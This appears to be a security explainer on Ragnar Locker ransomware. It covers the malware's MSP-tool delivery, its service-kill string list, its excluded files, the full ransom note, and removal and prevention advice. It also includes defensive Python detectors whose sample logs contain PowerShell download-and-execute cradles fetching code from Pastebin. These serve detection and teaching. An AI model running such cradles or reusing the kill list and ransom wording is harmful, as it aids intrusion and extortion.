Ransomware is a particularly nasty kind of malware because the attackers demand that the victim pay up to have his or her important data released from being held hostage. The ransomware stealthily infects the victim’s device, encrypts the important data (including backup files), then leaves instructions on how much ransom should be paid and how to pay it. After all of this hassle, the victim has no guarantee that the attacker will actually release the decryption key to unlock the files. And if they ever do, some of the files might be corrupted, rendering them useless in the end.
Over the years, the use of ransomware has grown in popularity because it is the most direct way for hackers to earn money. They just need to drop the malware, then wait for the user to send money through Bitcoin. According to data from Emsisoft, the number of ransomware attacks in 2019 increased by 41% over the previous year, affecting around 1,000 U.S. organizations. Cybersecurity Ventures even predicted that ransomware will attack a business every 11 seconds.
Earlier this year, Ragnar Locker, a new strain of malware, attacked Energias de Portugal (EDP), a Portuguese electric utility company, headquartered in Lisbon. The attackers demanded 1,580 bitcoins as ransom, which is equivalent to around $11 million.
What is Ragnar Locker Ransomware?
Ragnar Locker is a type of ransomware created not just to encrypt data, but also to kill installed applications that are usually used by managed service providers, such as ConnectWise and Kaseya, as well as several Windows services. Ragnar Locker renames the encrypted files by appending a unique extension composed of the word ragnar followed by a string of random numbers and characters. For example, a file named A.jpg will be renamed to A.jpg.ragnar_0DE48AAB.
After encrypting the files, it then creates a ransom message in a text file whose name carries the same identifier as the extension in the example above. The ransom message could be named RGNR_0DE48AAB.txt.
This ransomware only runs on Windows computers, and it is not yet known whether the authors of this malware have also designed a Mac version of Ragnar Locker. It usually targets processes and applications commonly used by managed service providers to keep its attack from being detected and stopped. Ragnar Locker is only aimed at English-speaking users.
Ragnar Locker ransomware was first detected around the end of December 2019, when it was used as part of attacks against compromised networks. According to security experts, the Ragnar Locker attack on the European energy giant was a well-thought-out and thoroughly planned attack.
Here is an example of the Ragnar Locker ransom message:
Hello * !
********************
If you reading this message, then your network was PENETRATED and all of your files and data has been ENCRYPTED
by RAGNAR_LOCKER !
********************
*********What happens with your system ?************
Your network was penetrated, all your files and backups was locked! So from now there is NO ONE CAN HELP YOU to get your files back, EXCEPT US.
You can google it, there is no CHANCES to decrypt data without our SECRET KEY.
But don’t worry ! Your files are NOT DAMAGED or LOST, they are just MODIFIED. You can get it BACK as soon as you PAY.
We are looking only for MONEY, so there is no interest for us to steel or delete your information, it’s just a BUSINESS $-)
HOWEVER you can damage your DATA by yourself if you try to DECRYPT by any other software, without OUR SPECIFIC ENCRYPTION KEY !!!
Also, all of your sensitive and private information were gathered and if you decide NOT to pay,
we will upload it for public view !
****
***********How to get back your files ?******
To decrypt all your files and data you have to pay for the encryption KEY :
BTC wallet for payment: *
Amount to pay (in Bitcoin): 25
****
***********How much time you have to pay?**********
* You should get in contact with us within 2 days after you noticed the encryption to get a better price.
* The price would be increased by 100% (double price) after 14 Days if there is no contact made.
* The key would be completely erased in 21 day if there is no contact made or no deal made.
Some sensetive information stolen from the file servers would be uploaded in public or to re-seller.
****
***********What if files can’t be restored ?******
To prove that we really can decrypt your data, we will decrypt one of your locked files !
Just send it to us and you will get it back FOR FREE.
The price for the decryptor is based on the network size, number of employees, annual revenue.
Please feel free to contact us for amount of BTC that should be paid.
****
! IF you don’t know how to get bitcoins, we will give you advise how to exchange the money.
!!!!!!!!!!!!!
! HERE IS THE SIMPLE MANUAL HOW TO GET CONTCAT WITH US !
!!!!!!!!!!!!!
1) Go to the official website of TOX messenger ( hxxps://tox.chat/download.html )
2) Download and install qTOX on your PC, choose the platform ( Windows, OS X, Linux, etc. )
3) Open messenger, click “New Profile” and create profile.
4) Click “Add friends” button and search our contact *
5) For identification, send to our support data from —RAGNAR SECRET—
IMPORTANT ! IF for some reasons you CAN’T CONTACT us in qTOX, here is our reserve mailbox ( * ) send a message with a data from —RAGNAR SECRET—
WARNING!
-Do not try to decrypt files with any third-party software (it will be damaged permanently)
-Do not reinstall your OS, this can lead to complete data loss and files cannot be decrypted. NEVER!
-Your SECRET KEY for decryption is on our server, but it will not be stored forever. DO NOT WASTE TIME !
********************
—RAGNAR SECRET—
*
—RAGNAR SECRET—
********************
What Does the Ragnar Locker Do?
Ragnar Locker is usually delivered via MSP tools such as ConnectWise, through which the cybercriminals drop a highly targeted ransomware executable. This propagation technique has been used by previous highly damaging ransomware, such as Sodinokibi. In this type of attack, the operators of the ransomware infiltrate organizations or facilities via unsecured or badly secured RDP connections. They then use those tools to push PowerShell scripts to all accessible endpoints. The scripts download a payload via Pastebin that is designed to execute the ransomware and encrypt the endpoints. In some instances, the payload comes in the form of an executable file that is launched as part of a file-based attack. There are also cases where additional scripts are downloaded as part of a completely file-less attack.
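As an added example that is not from the original article or from any vendor report, here is a small Python script with the kind of detection logic a defender would apply to the delivery chain described above: it classifies PowerShell script-block log records for download-and-execute cradles that fetch from Pastebin, and it flags a single account running such cradles across many hosts, which is the fan-out you would expect when an MSP tool is abused to push a script to every endpoint. The records are constructed sample data modelled on PowerShell script-block logging (Event ID 4104); the host names, the user name and the paste IDs are placeholders.

```python
import re
from collections import defaultdict

# Constructed sample records modelled on PowerShell script-block logging
# (Event ID 4104). Hosts, users and paste IDs are placeholders, not real data.
SAMPLE_EVENTS = [
    {"ts": "2020-04-13T02:10:01", "host": "ws01", "user": "CORP\\svc_rmm",
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"ts": "2020-04-13T02:10:04", "host": "ws02", "user": "CORP\\svc_rmm",
     "script": "$c = New-Object Net.WebClient; Invoke-Expression $c.DownloadString('https://pastebin.com/raw/EXAMPLE1')"},
    {"ts": "2020-04-13T02:10:05", "host": "ws03", "user": "CORP\\svc_rmm",
     "script": "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE2')"},
    {"ts": "2020-04-13T02:10:06", "host": "ws04", "user": "CORP\\svc_rmm",
     "script": "iex (iwr 'https://pastebin.com/raw/EXAMPLE3' -UseBasicParsing).Content"},
    {"ts": "2020-04-13T09:41:10", "host": "ws05", "user": "CORP\\jdoe",
     "script": "Invoke-WebRequest https://updates.example.com/patch.msi -OutFile C:\\Temp\\patch.msi"},
]

# Verbs that fetch remote content, verbs that run a string as code, and the paste host
# named in the article. Matching is case-insensitive because PowerShell is.
DOWNLOAD_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|\biwr\b|\birm\b", re.I)
EXEC_RE = re.compile(r"Invoke-Expression|\biex\b", re.I)
PASTE_RE = re.compile(r"pastebin\.com", re.I)


def classify_script(script):
    """Return (severity, reasons) for one script block.

    high   - fetches remote content and executes it in memory (a download cradle)
    medium - touches a paste site without the full cradle shape
    low    - plain download with no in-memory execution
    none   - nothing of interest
    """
    reasons = []
    if DOWNLOAD_RE.search(script):
        reasons.append("download")
    if EXEC_RE.search(script):
        reasons.append("in-memory execution")
    if PASTE_RE.search(script):
        reasons.append("paste site")
    if "download" in reasons and "in-memory execution" in reasons:
        return "high", reasons
    if "paste site" in reasons:
        return "medium", reasons
    if reasons:
        return "low", reasons
    return "none", reasons


def find_mass_deployment(events, min_hosts=3):
    """Return {user: [hosts]} for users whose high-severity blocks ran on >= min_hosts hosts.

    One RMM/MSP service account pushing the same cradle to many endpoints is the
    fan-out pattern described above for Ragnar Locker's deployment through MSP tooling.
    """
    hosts_by_user = defaultdict(set)
    for ev in events:
        severity, _ = classify_script(ev["script"])
        if severity == "high":
            hosts_by_user[ev["user"]].add(ev["host"])
    return {u: sorted(h) for u, h in hosts_by_user.items() if len(h) >= min_hosts}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        severity, why = classify_script(ev["script"])
        print(f"{ev['host']:5} {severity:6} {', '.join(why)}")
    print("mass deployment:", find_mass_deployment(SAMPLE_EVENTS))
```

In production the same two checks would run over the real 4104 stream: the per-block classification catches the cradle itself, and the per-user host count catches the MSP-tool fan-out even when an individual block is obfuscated enough to score only medium.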
Ragnar Locker specifically targets software commonly run by managed service providers, matching service and process names against the following strings:
- vss
- sql
- memtas
- mepocs
- sophos
- veeam
- backup
- pulseway
- logme
- logmein
- connectwise
- splashtop
- kaseya
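As an added example that is not part of the original article, the following Python script turns the string list above into detection logic: it parses constructed Windows System-log style lines (modelled on Event ID 7036, "service entered the stopped state"), matches stopped service names against the strings, and alerts when several targeted services on one host stop within a short window, which is the pre-encryption service-kill behaviour rather than a routine maintenance restart. Host names, timestamps and service names in the sample are constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Substrings Ragnar Locker matches against service and process names (the list above).
TARGET_STRINGS = ["vss", "sql", "memtas", "mepocs", "sophos", "veeam", "backup",
                  "pulseway", "logme", "logmein", "connectwise", "splashtop", "kaseya"]

# Constructed sample lines modelled on Windows System log Event ID 7036 records
# ("The <service> service entered the <state> state."). Hosts, times and service
# names are made up for this example; this is not real telemetry.
SAMPLE_LOG = """\
2020-04-13 02:11:02 srv01 7036 The wuauserv service entered the stopped state.
2020-04-13 02:12:40 srv01 7036 The VSS service entered the stopped state.
2020-04-13 02:12:41 srv01 7036 The MSSQLSERVER service entered the stopped state.
2020-04-13 02:12:41 srv01 7036 The VeeamBackupSvc service entered the stopped state.
2020-04-13 02:12:42 srv01 7036 The Sophos MCS Agent service entered the stopped state.
2020-04-13 02:12:43 srv01 7036 The ConnectWise Control Client service entered the stopped state.
2020-04-13 08:00:00 srv02 7036 The VeeamBackupSvc service entered the stopped state.
2020-04-13 08:30:00 srv02 7036 The VeeamBackupSvc service entered the running state.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<eid>\d+) "
    r"The (?P<service>.+?) service entered the (?P<state>\w+) state\.$"
)


def parse(log_text):
    """Parse the constructed log format into event dicts; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "host": m["host"],
            "service": m["service"],
            "state": m["state"],
        })
    return events


def matched_targets(service_name):
    """Return the target strings contained in a service name (case-insensitive)."""
    name = service_name.lower()
    return [s for s in TARGET_STRINGS if s in name]


def detect_service_kill_burst(events, window=timedelta(seconds=60), threshold=3):
    """Per host, report the first window in which >= threshold distinct targeted
    services entered the stopped state. Returns {host: [service, ...]}."""
    stops_by_host = defaultdict(list)
    for ev in events:
        if ev["state"] == "stopped" and matched_targets(ev["service"]):
            stops_by_host[ev["host"]].append(ev)

    alerts = {}
    for host, stops in stops_by_host.items():
        stops.sort(key=lambda e: e["ts"])
        for i, first in enumerate(stops):
            in_window = [e for e in stops[i:] if e["ts"] - first["ts"] <= window]
            services = sorted({e["service"] for e in in_window})
            if len(services) >= threshold:
                alerts[host] = services
                break
    return alerts


if __name__ == "__main__":
    for host, services in detect_service_kill_burst(parse(SAMPLE_LOG)).items():
        print(f"ALERT {host}: {len(services)} targeted services stopped within 60s: {services}")
```

The single Veeam stop on srv02 is deliberately left out of the alert: a backup service being restarted during maintenance is normal, whereas shadow copies, the database, backup, the endpoint protection agent and the remote-management client all stopping within a few seconds of each other is not.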
The ransomware first steals a target’s files and uploads them to the attackers’ servers. What’s unique about Ragnar Locker is that the operators don’t simply encrypt the files but also threaten the victim that the data will be released publicly if the ransom is not paid, as was the case with EDP. With EDP, the attackers threatened to release the supposed 10TB of stolen data, which could be one of the biggest data leaks in history. The attackers claimed that all partners, clients, and competitors would be informed of the breach and that the leaked data would be sent to news and media sources for public consumption. Although EDP’s spokesperson announced that the attack did not have an impact on the utility’s power service and infrastructure, the looming data breach is something they are worried about.
Disabling services and terminating processes are common tactics used by malware to disable security programs, backup systems, databases, and mail servers. Once these programs have been terminated, their data can then be encrypted.
When first launched, Ragnar Locker scans the configured Windows language preferences. If the language preference is English, the malware continues with the next step. But if Ragnar Locker detects that the language is set to one of the former USSR countries, the malware terminates its own process and does not proceed with encrypting the computer.
Ragnar Locker compromises the MSP’s security tools before they can block the ransomware from being executed. Once inside, the malware initiates the encryption process. It uses an embedded RSA-2048 key to encrypt the important files.
Ragnar Locker does not encrypt all files. It skips certain folders, filenames, and extensions, such as:
- kernel32.dll
- Windows
- Windows.old
- Tor browser
- Internet Explorer
- Opera
- Opera Software
- Mozilla
- Mozilla Firefox
- $Recycle.Bin
- ProgramData
- All Users
- autorun.inf
- boot.ini
- bootfont.bin
- bootsect.bak
- bootmgr
- bootmgr.efi
- bootmgfw.efi
- desktop.ini
- iconcache.db
- ntldr
- ntuser.dat
- ntuser.dat.log
- ntuser.ini
- thumbs.db
- .sys
- .dll
- .lnk
- .msi
- .drv
- .exe
Aside from appending a new file extension to the encrypted files, Ragnar Locker also adds a ‘RAGNAR’ file marker to the end of every encrypted file.
Ragnar Locker then drops a ransom message named ‘.RGNR_[extension].txt’ containing details on the ransom amount, the bitcoin payment address, a TOX chat ID to be used to communicate with the attackers, and a backup email address in case there are problems with TOX. Unlike other ransomware, Ragnar Locker does not have a fixed ransom amount. It varies according to the target and is calculated individually. In some reports, the ransom amount varied between $200,000 and $600,000. In the case of EDP, the ransom asked was 1,580 bitcoin, or $11 million.
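As an added example that is not from the original article, the following Python script scopes an infection from the on-disk traces described in the two paragraphs above: the appended .ragnar_<id> extension, the ‘RAGNAR’ marker at the end of each encrypted file, and the RGNR_<id>.txt note. It builds a constructed directory tree in a temporary folder so it runs offline, then reports which files carry both the extension and the marker, which carry the extension only (worth a second look before trusting any recovery), and which ransom notes and identifiers were seen. The assumption that the identifier is hexadecimal is taken from the A.jpg.ragnar_0DE48AAB example; the regular expressions and file names are mine.

```python
import os
import re
import tempfile
from pathlib import Path

# Assumption based on the A.jpg.ragnar_0DE48AAB example: the appended identifier is hexadecimal.
EXT_RE = re.compile(r"\.ragnar_([0-9A-Fa-f]+)$")
# The note is described both as RGNR_<id>.txt and as .RGNR_<id>.txt, so the leading dot is optional.
NOTE_RE = re.compile(r"^\.?RGNR_([0-9A-Fa-f]+)\.txt$")
# Marker appended to the end of every encrypted file.
TRAILER = b"RAGNAR"


def has_trailer(path):
    """True if the file ends with the RAGNAR marker; reads only the last few bytes."""
    with open(path, "rb") as f:
        f.seek(0, os.SEEK_END)
        size = f.tell()
        if size < len(TRAILER):
            return False
        f.seek(size - len(TRAILER))
        return f.read() == TRAILER


def triage(root):
    """Walk root and classify files by the traces Ragnar Locker leaves on disk."""
    root = Path(root)
    report = {"encrypted": [], "extension_only": [], "notes": [], "ids": set()}
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        ext = EXT_RE.search(p.name)
        if ext:
            report["ids"].add(ext.group(1).upper())
            if has_trailer(p):
                report["encrypted"].append(rel)
            else:
                # Renamed but no trailer: inconsistent with a completed encryption,
                # so keep it separate and inspect it before any recovery attempt.
                report["extension_only"].append(rel)
        note = NOTE_RE.match(p.name)
        if note:
            report["ids"].add(note.group(1).upper())
            report["notes"].append(rel)
    for key in ("encrypted", "extension_only", "notes"):
        report[key].sort()
    report["ids"] = sorted(report["ids"])
    return report


def build_sample_tree():
    """Create a constructed directory tree in a temp folder that mimics the traces described above."""
    root = Path(tempfile.mkdtemp(prefix="ragnar_triage_"))
    docs = root / "Documents"
    docs.mkdir()
    (docs / "A.jpg.ragnar_0DE48AAB").write_bytes(b"\x00" * 64 + TRAILER)   # renamed and marked
    (docs / "B.docx.ragnar_0DE48AAB").write_bytes(b"\x01" * 64 + TRAILER)  # renamed and marked
    (docs / "C.xlsx").write_bytes(b"untouched spreadsheet")                  # not touched
    (docs / "D.pdf.ragnar_0DE48AAB").write_bytes(b"\x02" * 16)              # renamed, no marker
    (root / "RGNR_0DE48AAB.txt").write_text("placeholder ransom note text")  # constructed note
    return str(root)


if __name__ == "__main__":
    report = triage(build_sample_tree())
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against a real share the same function gives an inventory of what was touched, a list of every identifier seen (more than one usually means more than one run or more than one machine did the encrypting), and the note locations, which is the input the "check whether all of your files have been encrypted" step in the removal section needs.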
How to Remove Ragnar Locker
If your computer was unlucky enough to be infected with Ragnar Locker, the first thing you need to do is check whether all of your files have been encrypted. You also need to check whether your backup files have been encrypted as well. Attacks like this highlight the importance of having a backup of your important data, because then at least you won’t have to worry about losing access to your files.
Do not attempt to pay the ransom, because it will be useless. There is no guarantee that the attacker will send you the correct decryption key or that your files will never be leaked to the public. In fact, it is highly possible that the attackers will continue to extort money from you because they know that you are willing to pay.
What you can do is delete the ransomware from your computer first, before trying to decrypt your files. You can use your antivirus or anti-malware app to scan your computer for malware and follow the instructions to delete all detected threats. Next, uninstall any suspicious apps or extensions that might be related to the malware.
Finally, look for a decryption tool that matches Ragnar Locker. Several decryptors have been designed for files encrypted by ransomware, but you should first check with your security software vendor whether they have one available. For example, Avast and Kaspersky have their own decryption tools that users can use. Here is a list of other decryption tools you can try.
How to Protect Yourself from Ragnar Locker
Ransomware can be quite troublesome, especially if there is no existing decryption tool capable of undoing the encryption performed by the malware. To protect your device from ransomware, particularly Ragnar Locker, here are some tips to keep in mind:
- Employ a strong password policy, using two-factor or multi-factor authentication (MFA) if possible. If that is not possible, generate random, unique passwords that will be difficult to guess.
- Make sure to lock your computer when leaving your desk. Whether you’re going out for lunch, taking a short break, or just going to the restroom, lock your computer to prevent unauthorized access.
- Create a data backup and recovery plan, especially for critical information on your computer. Store the most critical information outside the network or on an external device if possible. Test these backups regularly to make sure that they function correctly in the event of a real crisis.
- Make sure your systems are updated with the latest security patches. Ransomware usually exploits vulnerabilities in your system, so make sure that your device’s security is air-tight.
- Be wary of the common vectors for phishing, which is the most common distribution method for ransomware. Don’t click random links, and always scan email attachments before downloading them to your computer.
- Have robust security software installed on your device and keep its threat database updated.